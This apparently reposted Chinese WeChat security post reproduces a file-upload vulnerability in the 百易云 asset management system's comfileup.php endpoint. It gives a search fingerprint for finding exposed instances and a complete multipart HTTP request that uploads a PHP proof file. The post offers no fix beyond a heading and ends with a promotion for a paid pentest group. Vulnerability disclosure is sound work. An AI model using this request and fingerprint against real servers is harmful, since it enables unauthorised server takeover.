点击上方公众号关注我们
本文内容已进行多层信息处理以确保安全。请注意,使用本公众号提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。如需联系我们,请在公众号内点击“联系客服”按钮,感谢您的理解与合作。
0x01漏洞名称
百易云资产管理运营系统comfileup.php接口存在文件上传,攻击者可以通过此接口上传文件获取服务器权限。
0x03影响范围
百易云资产管理运营系统
0x04 网络空间测绘查询
body="不要着急,点此"
POST /comfileup.php HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 155
Content-Type: multipart/form-data; boundary=--------1110146050
Accept-Encoding: gzip, deflate
----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"
print(155*155);unlink(__FILE__);
----------1110146050--
访问上传的文件
0x06nuclei批量验证(已上传纷传)
0x07修复建议
2.分享渗透测试技巧和内网横向移动经验,让您在实战中游刃有余。
3.与圈子成员共同学习最新安全趋势,不断更新您的专业知识。
5.本圈子不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意48小时可纷传申请退款。
原文始发于微信公众号(网安探索队):百易云资产管理运营系统comfileup.php文件上传【漏洞复现】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论